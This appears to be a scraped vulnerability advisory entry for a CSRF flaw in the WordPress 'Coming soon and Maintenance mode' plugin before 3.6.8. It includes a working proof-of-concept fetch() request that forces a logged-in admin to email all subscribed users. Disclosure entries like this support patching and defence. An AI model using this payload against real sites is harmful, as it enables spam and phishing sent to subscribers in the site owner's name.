Lucene search

K
wpexploitKrzysztof ZającWPEX-ID:1AB1748F-C939-4953-83FC-9DF878DA7714
HistoryJan 24, 2022 - 12:00 a.m.

Coming soon and Maintenance mode < 3.6.8 - Arbitrary Email Sending to Subscribed Users via CSRF

2022-01-2400:00:00
Krzysztof Zając
107

0.001 Low

EPSS

Percentile

30.2%

The plugin does not have CSRF check in its coming_soon_send_mail AJAX action, allowing attackers to make logged in admin to send arbitrary emails to all subscribed users via a CSRF attack

fetch("https://example.com/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": "action=coming_soon_send_mail&massage_title=title&massage_description=description&massage_from_name=from&[email protected]",
  "method": "POST",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

0.001 Low

EPSS

Percentile

30.2%

Related for WPEX-ID:1AB1748F-C939-4953-83FC-9DF878DA7714